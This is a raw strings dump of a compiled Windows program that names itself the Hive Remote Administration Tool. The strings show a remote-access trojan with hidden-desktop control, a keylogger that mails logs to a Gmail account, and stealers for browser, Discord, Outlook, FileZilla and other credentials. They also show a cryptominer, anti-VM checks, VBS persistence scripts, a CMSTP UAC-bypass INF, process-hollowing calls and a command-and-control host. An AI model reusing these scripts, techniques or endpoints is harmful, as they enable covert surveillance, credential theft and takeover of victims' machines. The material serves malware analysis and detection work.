!This program cannot be run in DOS mode.
`.rsrc
@.reloc
KDBM("
v4.0.30319
#Strings
__StaticArrayInitTypeSize=10
Isgreaterorequalto81
FindWindowEx_1
Collection`1
List`1
get_Button1
set_Button1
buffer1
get_TextBox1
set_TextBox1
__StaticArrayInitTypeSize=32
kernel32
Microsoft.Win32
ToInt32
KeyValuePair`2
Dictionary`2
cbReserved2
lpReserved2
Startclogging2
Email2
collection2
buffer2
get_TextBox2
set_TextBox2
AAA2C593325A6E943911DFD53B725C28A68B27938765C83DBE2EC87827F002D3
decodeBase64
ToUInt64
ToInt64
__StaticArrayInitTypeSize=5
ToUInt16
ToInt16
A4E9167DC11A5B8BA7E09C85BAFDEA0B6E0B399CE50086545509017050B33097
get_UTF8
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
<Module>
<PrivateImplementationDetails>
BF987C4258B4057871A8F1E5E2A46865B41E73B13409FE2876CA74DC1EB57B7A
GWL_USERDATA
DelegateCreateProcessA
LoadLibraryA
lpfnCB
CheckKey4DB
BCRYPT_KEY_DATA_BLOB
47296FE37886C1205B69A33D3379E2934313C8D850E49F7C596F908D64876C3C
BCRYPT_KEY_DATA_BLOB_MAGIC
STOP_HVNC
START_HVNC
KillHVNC
StartHVNC
BrowserVNC
GWL_WNDPROC
DWLP_DLGPROC
MIB_TCPTABLE_OWNER_PID
MIB_TCPROW_OWNER_PID
GWL_ID
PlatformID
PostClickLD
SEND_CMD
STOP_CMD
START_CMD
SEND_CLIPBOARD
DESKTOP_JOURNALRECORD
ModifyRegDWORD
PostClickRD
GWLP_HINSTANCE
RUN_CUSTOM_CODE
BCRYPT_CHAINING_MODE
DISABLE
DOWNLOAD_FILE
SEND_FILE
UPDATE_FILE
DELETE_FILE
EXECUTE_FILE
START_FILE
GWL_EXSTYLE
GWL_STYLE
CCHDEVICENAME
CCHFORMNAME
GEOLOCATE
DESKTOP_ENUMERATE
OPEN_SITE
MOUSEEVENTF_ABSOLUTE
MOUSE_MOVE
MOUSEEVENTF_MOVE
LOG_OFF
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
NEW_REG
MODIFY_REG
SMTO_ABORTIFHUNG
SMTO_NOTIMEOUTIFNOTHUNG
STATUS_AUTH_TAG_MISMATCH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
get_ASCII
getDPI
DESKTOP_JOURNALPLAYBACK
MOUSE_CLICK
SMTO_BLOCK
DF_ALLOWOTHERACCOUNTHOOK
REMOTEDESK
SMTO_NORMAL
MOUSEEVENTF_HWHEEL
MOUSEEVENTF_WHEEL
UNINSTALL
TCP_TABLE_OWNER_PID_ALL
DESKTOP_HOOKCONTROL
UPDATE_URL
EXECUTE_URL
WEBCAM
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
AntiVM
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
STARTUP_INFORMATION
PROCESS_INFORMATION
WEBCAM_RESOLUTION
MOUSEEVENTF_MIDDLEDOWN
MOUSEEVENTF_LEFTDOWN
MOUSEEVENTF_RIGHTDOWN
MOUSEEVENTF_XDOWN
CreateLParamFor_WM_KEYDOWN
SHUT_DOWN
KEY_DOWN
LASTINPUTINFO
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
BCRYPT_OAEP_PADDING_INFO
BCRYPT_PSS_PADDING_INFO
COMPUTER_INFO
System.IO
MIB_ROW_To_TCP
BCRYPT_PAD_OAEP
CONSOLE_BEEP
ReturnBMP
DESKTOP_SWITCHDESKTOP
THUMBNAILS_STOP
MOUSEEVENTF_MIDDLEUP
MOUSEEVENTF_LEFTUP
MOUSEEVENTF_RIGHTUP
MOUSEEVENTF_XUP
CreateLParamFor_WM_KEYUP
RecoverQQ
MS_PRIMITIVE_PROVIDER
NEW_FOLDER
FILE_EXPLORER
DWLP_USER
STOP_HVNCBROWSER
START_HVNCBROWSER
RESIZE_BROWSER
MOUSE_CLICK_BROWSER
KEY_DOWN_BROWSER
PASSWORDS
decrypt3DES
SEND_KEYSTROKES
KILL_PROCESSES
SECURITY_ATTRIBUTES
GRAB_MINER_SETTINGS
UPDATE_MINER_SETTINGS
SEND_CLIP_LOGS
DELETE_EVENT_LOGS
SEND_CONNECTIONS
GRAB_BROWSERS
ON_C_SAVE_PASS
ERROR_SUCCESS
START_PROCESS
BCRYPT_PAD_PSS
DESKTOP_READOBJECTS
DESKTOP_WRITEOBJECTS
MSG_CHAT
START_CHAT
DISCONNECT
BCRYPT_KEY_LENGTHS_STRUCT
ADMIN_EXPLOIT
SMTO_ERRORONEXIT
DWLP_MSGRESULT
GWLP_HWNDPARENT
RUN_SCRIPT
RESTART
THUMBNAILS_START
cipherT
PostClickLU
DESKTOP_CREATEMENU
BTCCPU
LTCCPU
XMRCPU
BTCGPU
LTCGPU
PostClickRU
get_IV
set_IV
DESKTOP_CREATEWINDOW
decodePW
CreateDesktopW
GetWindowTextW
MSGBOX
SEND_REGISTRY
value__
camera
cbData
ProtectedData
encryptedData
GetClipboardData
HandleData
cbAuthData
pbAuthData
LocalApplicationData
ProjectData
dwData
screenGrab
mscorlib
disableuac
ReleaseHdc
GetHdc
get_Codec
System.Collections.Generic
Microsoft.VisualBasic
get_Id
ThreadId
pszAlgId
GetWindowThreadProcessId
lpdwProcessId
set_ContentId
GetProcessById
BeginRead
firstCharRead
bytesRead
idThread
DelegateResumeThread
PingThread
MainRenderThread
StopBrowserThread
LoopLogsThread
mousethread
Thumbnailthread
mainthread
chatthread
windowthread
add_Load
RemoteChat_Load
opencd
get_Red
lpnLengthNeeded
IsFileLocked
webcamenabled
get_Connected
connected
get_HasExited
lpReserved
dwReserved
row_id
stupid
szHwProfileGuid
record_header_field
ReadToEnd
ReceiveCommand
command
PingSend
Append
GetValueKind
RegistryValueKind
backupforeground
set_IsBackground
FromHwnd
GetMethod
set_DeliveryMethod
SmtpDeliveryMethod
method
CloseClipboard
OpenClipboard
GetClipboard
HiWord
LoWord
decryptOutlookPassword
CommonAce
NetworkInterface
Replace
device
RunOnce
procpersistence
regpersistence
Sequence
cbNonce
pbNonce
LinkedResource
wScanCode
set_Mode
deviceMode
set_AutoScaleMode
FileMode
PaddingMode
chainingMode
CryptoStreamMode
OpenMode
CompressionMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
OnPrintPage
FromImage
SendMessage
MailMessage
PostMessage
message
getLanguage
Sandboxie
EndInvoke
BeginInvoke
pTCPTable
ReadTable
GetExtendedTcpTable
ReadMasterTable
IsClipboardFormatAvailable
bEnable
IEnumerable
IDisposable
get_Visible
IsWindowVisible
compatible
get_Handle
ThreadHandle
RuntimeFieldHandle
FindHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
processHandle
WaitHandle
bInheritHandle
parentHandle
focusedhandle
foundhandle
FillRectangle
ToSingle
DeleteFile
URLDownloadToFile
ByteArrayToFile
HWProfile
fProfile
GetCurrentHwProfile
IsInRole
WindowsBuiltInRole
userrole
Console
lpTitle
get_MainWindowTitle
GetWindowTitle
windowTitle
get_MainModule
ProcessModule
FormatterTypeStyle
AppWinStyle
set_FormBorderStyle
FontStyle
set_WindowStyle
ProcessWindowStyle
FormatterAssemblyStyle
CPUName
GPUName
AVName
get_Name
set_Name
get_DeviceName
QueryFullProcessImageName
TableName
get_FileName
GetMainModuleFileName
szFileName
szHwProfileName
lpModuleName
baseName
lpExeName
get_OSFullName
get_FullName
applicationName
desktopName
get_UserName
lpClassName
lclassName
get_ProcessName
lpWindowName
GetProcessesByName
astable_name
item_name
tablename
filename
getUsername
killprocessbyname
System.Net.Mime
IdleTime
DateTime
GetInactiveTime
dwTime
WaitOne
commandLine
AppendLine
WriteLine
get_NewLine
Combine
LocalMachine
set_Multiline
DataProtectionScope
pszBlobType
WellKnownSidType
ChangeType
get_MimeType
CheckForSyncLockOnValueType
GetType
set_ContentType
item_type
FileShare
OpenShare
Compare
DownBefore
PtrToStructure
get_CurrentCulture
EndCapture
screenCapture
StartCapture
MethodBase
ButtonBase
AttachmentBase
TextBoxBase
FileClose
System.IDisposable.Dispose
IDisposable_Dispose
dataToParse
showmouse
GeoLocate
lprcUpdate
hrgnUpdate
Create
MulticastDelegate
get_ThreadState
GetKeyboardState
TcpState
set_LingerState
SetApartmentState
GetAsyncKeyState
lpKeyState
GetKeyState
Activate
Delete
STAThreadAttribute
CompilerGeneratedAttribute
DesignerGeneratedAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
ObsoleteAttribute
DebuggerStepThroughAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
XmlAttribute
AssemblyFileVersionAttribute
SecurityPermissionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
AccessedThroughPropertyAttribute
set_UseShellExecute
DLByte
WriteByte
get_Value
DeleteValue
ExtractValue
GetObjectValue
GetValue
SetValue
OnReceive
updater.exe
dwXSize
dwYSize
get_Size
set_Size
cbSize
SQLDataTypeSize
MaxAuthTagSize
screenSize
set_AutoSize
bufferSize
set_ClientSize
lpdwSize
Serialize
Deserialize
Initialize
page_size
Resize
resize
SizeOf
get_ItemOf
LastIndexOf
cchBuff
pwszBuff
ElevateSelf
authTag
BitmapToJpeg
CurrentConfig
returnImg
System.Threading
set_Padding
NewLateBinding
UTF8Encoding
mEncoding
set_StandardErrorEncoding
set_StandardOutputEncoding
_encoding
System.Drawing.Imaging
Startclogging
IsMining
IsDiscordRunning
System.Runtime.Versioning
FromBase64String
TCPString
Bytes_To_String
mciSendString
CompareString
ModifyRegString
CreateAlternateViewFromString
ToString
lpString
GetString
OctetString
BitString
DrawString
Substring
asstring
add_FormClosing
disposing
System.Drawing.Printing
System.Drawing
SetWindowLong
EventLog
set_ErrorDialog
Stopwatch
SolidBrush
get_ExecutablePath
GetTempPath
GetFolderPath
DirectoryPath
keypath
get_Width
get_Length
dwMinLength
dwMaxLength
get_BinaryLength
length
StartsWith
PtrToStringUni
LoadApi
CreateApi
uTImeoutj
MyDelegateCallBack
AsyncCallback
hwndCallback
WaitCallback
callback
get_Black
Button1_Click
add_Click
remove_Click
_readLock
GlobalLock
_readStreamLock
Unblock
showclock
GlobalUnlock
GetCapslock
accessMask
AllocHGlobal
FreeHGlobal
Marshal
NetworkCredential
Decimal
System.Security.Principal
WindowsPrincipal
ConditionalCompareObjectEqual
ConditionalCompareObjectNotEqual
interval
cbLabel
pbLabel
System.Collections.ObjectModel
System.ComponentModel
set_FilterLevel
TypeFilterLevel
System.Net.Mail
SendEmail
GetFoxmail
GetThumbnail
LateCall
gdi32.dll
advapi32.dll
Kernel32.dll
kernel32.dll
user32.dll
dwmapi.dll
iphlpapi.dll
winmm.dll
urlmon.dll
bcrypt.dll
camdll
AntiKill
System.Xml
ThreadPool
ContainerControl
System.Security.AccessControl
ObjectFlowControl
CSharpImpl
set_EnableSsl
Webcam
endcam
startcam
ReadStream
FileStream
get_BaseStream
NetworkStream
FromStream
CryptoStream
GZipStream
GetStream
MemoryStream
nstream
MakeLParam
KeysLParam
get_Param
lParam
wParam
AesGcm
get_Item
QueueUserWorkItem
FileSystem
OperatingSystem
SymmetricAlgorithm
phAlgorithm
set_From
Bottom
closemainfrm
GetBinaryForm
ICryptoTransform
get_Platform
Chromium
root_num
row_num
BytesIn
ToBoolean
OutLen
hidden
CopyFromScreen
get_PrimaryScreen
IsFileOpen
bytesWritten
__Assign
AppDomain
get_CurrentDomain
set_ShowIcon
MessageBoxIcon
GetFileNameWithoutExtension
get_OSVersion
get_Version
dwInfoVersion
IpVersion
Conversion
System.IO.Compression
Application
set_Location
System.Net.NetworkInformation
processInformation
securityInformation
pszImplementation
System.Globalization
SecurityAction
Interaction
DelegateZwUnmapViewOfSection
FunSection
System.Reflection
LinkedResourceCollection
XmlAttributeCollection
MatchCollection
ControlCollection
GroupCollection
MailAddressCollection
ManagementObjectCollection
AlternateViewCollection
collection
TcpConnection
encryptedconnection
EnableProtection
lpEnumCallbackFunction
set_Position
DwmEnableComposition
SearchOption
LingerOption
Win32Exception
IOException
ObjectDisposedException
ApplicationException
GetHRForException
SocketException
ManagementException
exception
resolution
turnon
Environ
monitoron
StringComparison
Button
showstartbtn
HandleRun
TryRun
PostKeydown
get_To
CompareTo
ConvertTo
showdesktopico
getOSInfo
dwExtraInfo
ImageCodecInfo
MethodInfo
FileInfo
CultureInfo
pPaddingInfo
dwDockInfo
FileSystemInfo
startupInfo
MemberInfo
ParameterInfo
ComputerInfo
ServerInfo
set_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
dpiRatio
ResizeBitmap
KillLoop
WindowLoop
hDesktop
lpDesktop
hNewDesktop
EndApp
AddStartup
ElevateSelfStartup
startup
PrintVar
set_ShowInTaskbar
showtaskbar
ToChar
Asn1Der
XmlReader
StreamReader
streamReader
XmlTextReader
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
provider
StringBuilder
LocalStateFolder
SpecialFolder
sender
Encoder
SendAndFlushBuffer
buffer
ResourceManager
ToUInteger
ConvertToInteger
ManagementObjectSearcher
AceQualifier
ObjectIdentifier
SecurityIdentifier
NoIPStealer
DiscordStealer
PidginStealer
ProxifierStealer
SqLiteHandler
FormClosingEventHandler
pCaller
RemoteDesktopController
ManageMiner
HandleMiner
IContainer
hWndNewOwner
DBHelper
TripleDESHelper
startexplorer
CurrentUser
ResizeBrowser
browser
updater
ConditionalCompareObjectGreater
ToGenericParameter
EncoderParameter
childAfter
hWndInsertAfter
StreamWriter
_inputWriter
TextWriter
BinaryWriter
filter
GetDelegateForFunctionPointer
ImageConverter
TypeConverter
BitConverter
showchatter
BinaryFormatter
FFRecover
QQRecover
FileZillaRecover
OutlookRecover
FoxRecover
ToLower
enabletaskmgr
get_Major
set_UseVisualStyleBackColor
get_Minor
get_StandardError
set_RedirectStandardError
hStdError
isError
ClearProjectError
SetProjectError
Cursor
CrytpoObfuscator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
Monitor
GenericSecurityDescriptor
lpSecurityDescriptor
GetProcessSecurityDescriptor
SetProcessSecurityDescriptor
RawSecurityDescriptor
DESCBCDecryptor
CreateDecryptor
Integerr
StructureToPtr
IntPtr
MidStr
dwNewintptr
codecs
get_Graphics
System.Diagnostics
endthreads
stopuploads
startuploads
get_ElapsedMilliseconds
get_Bounds
GetOutlookPasswords
GrabAllPasswords
GetPasswords
getScreenRes
GetAllNetworkInterfaces
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
System.Resources
get_LinkedResources
DebuggingModes
get_ChildNodes
SelectNodes
set_HasMorePages
Matches
Brushes
GetDirectories
NumberOfEntries
master_table_entries
Pinvokes
inheritHandles
ReturnFiles
GetFiles
GetAllProfiles
GetTableNames
GetValueNames
GetSubKeyNames
field_names
ReadAllLines
Features
LoadProcesses
GetProcesses
get_Attributes
threadAttributes
processAttributes
attributes
XORBytes
WriteBytes
ReadAllBytes
GetBytes
db_bytes
GetLogicalDrives
ReturnDrives
AceFlags
WindowLongFlags
creationFlags
MouseEventFlags
SendMessageTimeoutFlags
uFlags
dwFlags
Strings
Minersettings
LoopLogs
GetEventLogs
emaillogs
screenlogs
PrintPageEventArgs
FormClosingEventArgs
set_Credentials
set_UseDefaultCredentials
Equals
LoopThumbnails
set_CheckForIllegalCrossThreadCalls
get_Controls
System.Windows.Forms
get_AllScreens
Contains
set_AutoScaleDimensions
Conversions
System.Text.RegularExpressions
System.Security.Permissions
System.Collections
GetAllTCPConnections
EncryptionFunctions
StringSplitOptions
RegexOptions
MessageBoxButtons
SetWindowPos
GetDeviceCaps
get_Groups
get_Chars
countOfChars
GetInvalidPathChars
dwXCountChars
dwYCountChars
removechars
GetAppDataFolders
GetImageEncoders
RuntimeHelpers
BitmapHelpers
returnbrowsers
EncoderParameters
GetParameters
System.Runtime.Serialization.Formatters
Operators
GetFFTBPass
InitalizePass
PrintClass
dwClass
emailpass
ConditionalCompareObjectLess
FileAccess
OpenAccess
get_Success
hProcess
GetCurrentProcess
process
IPAddress
getMacAddress
GetProcAddress
baseAddress
RemoteAddress
GetPhysicalAddress
localAddress
MailAddress
CoordsToAddress
address
System.Net.Sockets
set_Arguments
components
DeleteEvents
DoEvents
UploadScreenshots
ObjLists
get_Exists
RedirectOutputs
get_AlternateViews
EnumDesktopWindows
hideallwindows
GetDisplays
arrays
SendKeys
Concat
RemoteChat
addchat
set_TypeFormat
uFormat
set_AssemblyFormat
format
Subtract
lpRect
GetWindowRect
AddObject
ManagementBaseObject
CreateObject
ConcatenateObject
hObject
Asn1DerObject
SubtractObject
GetObject
ManagementObject
cbKeyObject
pbKeyObject
MultiplyObject
object
set_Subject
CustomSubject
Collect
Connect
direct
Unprotect
TCPGet
FileGet
LateGet
LateIndexGet
System.Net
LateSet
target
WriteToSocket
ReadTableFromOffset
offset
GetShift
get_Height
height
Lenght
SendWait
op_Explicit
enableregedit
GraphicsUnit
WaitForExit
hdcBlt
cbSalt
globalSalt
entrySalt
get_Default
pcbResult
IAsyncResult
DialogResult
result
TcpClient
SmtpClient
System.Management
XmlElement
get_DocumentElement
dwIncrement
sql_statement
Environment
environment
XmlDocument
PrintDocument
InitializeComponent
get_Parent
GetParent
get_Current
GetCurrent
content
mouse_event
WindowFromPoint
get_EntryPoint
get_Count
GetTickCount
RepeatCount
GetRowCount
nMaxCount
TakeScreenShot
snapshot
ClassesRoot
BCrypt
BCryptDecrypt
BCryptEncrypt
ParameterizedThreadStart
TrimStart
Convert
remotePort
LocalPort
ipport
XmlNodeList
ICredentialsByHost
set_TopMost
set_SendTimeout
SendMessageTimeout
set_WriteTimeout
SuspendLayout
GetKeyboardLayout
ResumeLayout
PerformLayout
bytes_Input
cbInput
pbInput
get_StandardInput
set_RedirectStandardInput
hStdInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
hStdOutput
MoveNext
System.Text
get_Text
set_Text
AppendText
ReadAllText
WriteAllText
cipherText
get_InnerText
cbMacContext
pbMacContext
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateWow64SetThreadContext
DelegateSetThreadContext
context
windowtext
VbStrConv
AlternateView
get_Now
FindWindow
GetForegroundWindow
set_CreateNoWindow
GetWindow
PrintWindow
RedrawWindow
wShowWindow
nCmdShow
DelegateVirtualAllocEx
ToUnicodeEx
FindWindowEx
set_TabIndex
endIndex
nIndex
startIndex
LateSetComplex
objMutex
MessageBox
set_MinimizeBox
set_MaximizeBox
set_ControlBox
TextBox
ByteArray
InitializeArray
ToArray
CopyArray
showtray
emailbody
get_Key
set_Key
CreateSubKey
OpenSubKey
ReturnSubKey
IsExtendedKey
DecryptWithKey
GetMasterKey
nVirtKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
System.Security.Cryptography
get_Assembly
Multiply
BlockCopy
System.Runtime.Serialization.Formatters.Binary
GetItemsFromQuery
ObjectQuery
SelectQuery
DelegateReadProcessMemory
DelegateWriteProcessMemory
CreateDirectory
set_WorkingDirectory
currentDirectory
directory
table_entry
sqlite_master_entry
getCountry
HandleRegistry
ReturnRegistry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
GetKernelObjectSecurity
SetKernelObjectSecurity
WindowsIdentity
IsNullOrEmpty
BCryptGetProperty
BCryptSetProperty
pszProperty
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
Console App
Copyright
2021
1.0.0.0
.NETFramework,Version=v4.5
FrameworkDisplayName
.NET Framework 4.5G
BPlease refactor calling code to use normal Visual Basic assignment
Button1
TextBox1
TextBox2
updater.pdb
SHA256
rMPDBh
vfep{A
lZ@tP8
6+^<1'^d
wT}wZ0
;5i /S
k=f;34
G: -g;
{xF,w"o
9-Ilwb&~
CWO{hVG[
T(!*P(*Q}/1{\b
K,=.A'
}C[}GcT
[DWG}k'
zx%-b_
i~Sss4
g;c>OY
cSwK4S_FpFv
8=(>mZur
rcIwkmu4
C&eNx
?a\q~aA
N,+--,
^P]QW=
ySgw}se}gSC~cs
5lu#"|*
~Q2IRT
~G")-A
nvg1ER
+z2-&Q
x|aa:Y7
%bSs?L
F;+!rA
[+g[4V
3z(sm~
O1zS0y
?N2z9+
5Vc\~q
<kG[i%
{L~|jv
<}G|Tx
O,1?J
w=gf<;
NVk|PqO
<V~KlA
"@Lb&L
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
N AMby
9!:!;!<!=!>!?!@!A!B!C!D!E"F#G#H#I$J$K$L'M'N'O2
DiscretionaryAcl
InsertAce
localappdata
\Execution2.vbs
on error resume next
Do While True
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
oReg.GetStringValue &H80000001, "Software\Microsoft\Windows\CurrentVersion\RunOnce", "
", strValue
If IsNull(strValue) Then
set wshShell = CreateObject( "WScript.Shell" )
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\
set filesys = CreateObject("Scripting.FileSystemObject")
filesys.CopyFile"
set f = filesys.GetFile("
f.attributes = 7
End If
WScript.Sleep 1000
\Execution5.vbs
on error resume next
set objWMIService = GetObject ("winmgmts:")
foundProc = False
procName = "
Do While True
for each Process in objWMIService.InstancesOf ("Win32_Process")
If StrComp(Process.Name,procName,vbTextCompare) = 0 then
foundProc = True
End If
If foundProc = False Then
CreateObject("WScript.Shell").Run("""
End If
foundProc = False
WScript.Sleep 1000
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
image/jpeg
Hive Browser
Chrome
Firefox
Internet Explorer
chrome
--new-window "data:text/html,<title>Hive Browser</title>" --mute-audio --disable-audio --window-position=
firefox
-new-window "data:text/html,<title>Hive Browser</title>"
DuckDuckGo
iexplore
-new -extoff duckduckgo.com
microsoft-edge:duckduckgo.com
Default Browser
Exit and close tabs?
Close tabs?
appdata
\Google\Chrome
\Mozilla\Firefox
\Microsoft\WindowsApps\MicrosoftEdge.exe
\Microsoft\Internet Explorer
\Google\Chrome\User Data
Opera Software\Opera Stable
Yandex
Yandex\YandexBrowser\User Data
360 Browser
360Chrome\Chrome\User Data
Comodo Dragon
Comodo\Dragon\User Data
CoolNovo
MapleStudio\ChromePlus\User Data
SRWare Iron
Chromium\User Data
Torch Browser
Torch\User Data
Brave Browser
BraveSoftware\Brave-Browser\User Data
Iridium Browser
Iridium\User Data
7Star\7Star\User Data
Amigo\User Data
CentBrowser
CentBrowser\User Data
Chedot
Chedot\User Data
CocCoc
CocCoc\Browser\User Data
Elements Browser
Elements Browser\User Data
Epic Privacy Browser
Epic Privacy Browser\User Data
Kometa
Kometa\User Data
Orbitum
Orbitum\User Data
Sputnik
Sputnik\Sputnik\User Data
uCozMedia
uCozMedia\Uran\User Data
Vivaldi
Vivaldi\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Citrio
CatalinaGroup\Citrio\User Data
Coowon
Coowon\Coowon\User Data
Liebao Browser
liebao\User Data
QIP Surf
QIP Surf\User Data
Edge Chromium
Microsoft\Edge\User Data
logins
origin_url
username_value
password_value
Application:
Username:
Password :
\Default\Login Data
\Login Data
Profile
\Local State
"encrypted_key":"(.*?)"
[L-Click]
[R-Click]
[Enter]
[<-]
[Enter]
: PASSWORDS
REPLACETHESEKEYSTROKES
: KEYWORD -
text/html
<img src="cid:companyLogo" width=
height=
/> <br> <br>
companyLogo
image/jpg
keyloggerto@gmail.com
: KeylogSubject
keylogger@gmail.com
smtp.gmail.com
SMTPPORT
keyloggerpassword
UserProfile
session unexpectedly closed
4M9691
vonix.hopto.org
Hive Remote Administration Tool
Welcome to Hive! Your system is currently being monitored.
eHXM65NYZt
cmd.exe /c start
Contains
\runbat.bat
explorer.exe
\runvbs.vbs
Shutdown -r -f
Shutdown -s -f
Shutdown -l -f
\URLDL.exe
\URLUP.exe
Firebird.CommandHandler
HandleGetWebcams
\MSettings
AESPassword
\AppData\Roaming\discord\Local Storage\leveldb
discord
([A-z0-9]{24}\.[A-z0-9]{6}\.[A-z0-9]{27})
Application: Discord
Token:
Thunderbird
\Thunderbird
\Profiles
\key4.db
\logins.json
"hostname":"
encryptedUsername":"
","encryptedPassword
encryptedPassword":"
","guid
User:
[^\u0020-\u007F]
Pass:
\FileZilla\recentservers.xml
FileZilla Servers:
Host:
<Host>
</Host>
Port:
<Port>
</Port>
<User>
</User>
base64">
</Pass>
\FileZilla\sitemanager.xml
FileZilla Sites:
SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command
Foxmail.exe
LastIndexOf
Remove
Replace
Storage\
\Accounts\Account.rec0
Length
Account
POP3Account
Password
POP3Password
Foxmail:
https://whatismyipaddress.com/update-location
internetexplorer.application
Height
Navigate
ReadyState
Visible
Document
innerHTML
<td id="map1_lat"></td>
<td></td>
\t|\n|\r
<td id="map1_lng"></td>
Failed!
http://geocoder.ca/?locate=
This is the nearest street address. [ <a href="https://geocoder.ca/?locate=
Capacity
No Path
CMSTP.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
powershell.exe "Start-Process '
' -Verb RunAs"
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
[Strings]
ServiceName="CMMGR32"
ShortSvcName="CMMGR32"
on error resume next
CreateObject("Wscript.Shell").Run "
cmstp.exe
CreateObject("Scripting.FileSystemObject").DeleteFile WScript.ScriptFullName
\Junction.vbs
{ENTER}
Success
Failure
\Execution.vbs
on error resume next
set wshShell = CreateObject( "WScript.Shell" )
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\
HiddenStartfilesys.DeleteFile WScript.ScriptFullName
\Execution3.vbs
on error resume next
set wshShell = CreateObject( "WScript.Shell" )
wshShell.RegWrite "
", "REG_DWORD"
filesys.DeleteFile WScript.ScriptFullName
\Execution4.vbs
filesys.DeleteFile WScript.ScriptFullName
:Zone.Identifier
SbieDll.dll
ms.ini
root\CIMV2
SELECT * FROM Win32_VideoController
Description
virtual
vmware
parallel
vm additions
remotefx
generic
cirrus logic
standard vga
matrox
cmd.exe
/C ping 1.1.1.1 -n 1 -w 500 > Nul & Del "
yyyy/MM/dd HH:mm:ss
set CDAudio door open
set CDAudio door closed
Shell_traywnd
Shell_TrayWnd
taskkill
/F /IM explorer.exe
TrayNotifyWnd
TrayClockWClass
Progman
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
-S opencl:auto --scrypt --url=
--userpass=
-S opencl:auto --url=
--gpu-threads=2 --intensity=6 -x
--gpu-threads=2 --intensity=6
--url=
--proxy=
--algo=sha256d --proxy=
--algo=sha256d
-a cryptonight --url=
--max-cpu-usage=65
Uknown
REG_SZ
REG_EXPAND_SZ
REG_BINARY
REG_DWORD
REG_MULTI_SZ
REG_QWORD
Byte[]
RemoteDesktop
Windows\explorer.exe
Application: No-IP Dynamic Update Client
Username:
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Vitalwerks\DUC
Username
Password:
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Outlook:
GetBytes
SMTP Server
Nothing
SMTP:
\.purple\accounts.xml
\AppData\Roaming\.purple\
Application: Pidgin
Username:
\Roaming\Proxifier\Profiles\Default.ppx
ProxyList
Address
Authentication
enabled
Application: ProxifierIP:
Username:
Password:
C:\Documents and Settings\
Application Data
C:\Users\
\AppData
\Tencent\QQBrowser\User Data\Default\EncryptedStorage
entries
Tencent QQ:
Button1
TextBox1
TextBox2
RemoteChat
\\.\DISPLAY1
kernel32
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
CurrentHorizontalResolution
CurrentVerticalResolution
root\SecurityCenter
